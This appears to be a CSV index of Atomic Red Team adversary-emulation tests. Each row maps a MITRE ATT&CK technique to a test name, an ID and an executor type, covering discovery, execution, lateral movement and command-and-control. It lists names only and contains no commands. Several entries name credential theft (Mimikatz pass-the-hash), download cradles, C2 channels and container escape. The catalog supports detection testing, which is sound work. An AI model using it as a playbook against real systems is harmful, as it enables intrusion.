discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Local Account,11,Enumerate logged on users via PowerShell,2bdc42c7-8907-40c2-9c2b-42919a00fe03,powershell
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1021.001,Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Desktop Protocol,2,RDP to Server,7382a43e-f19c-46be-8f09-5c63af7d3e2b,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
command-and-control,T1071.004,DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
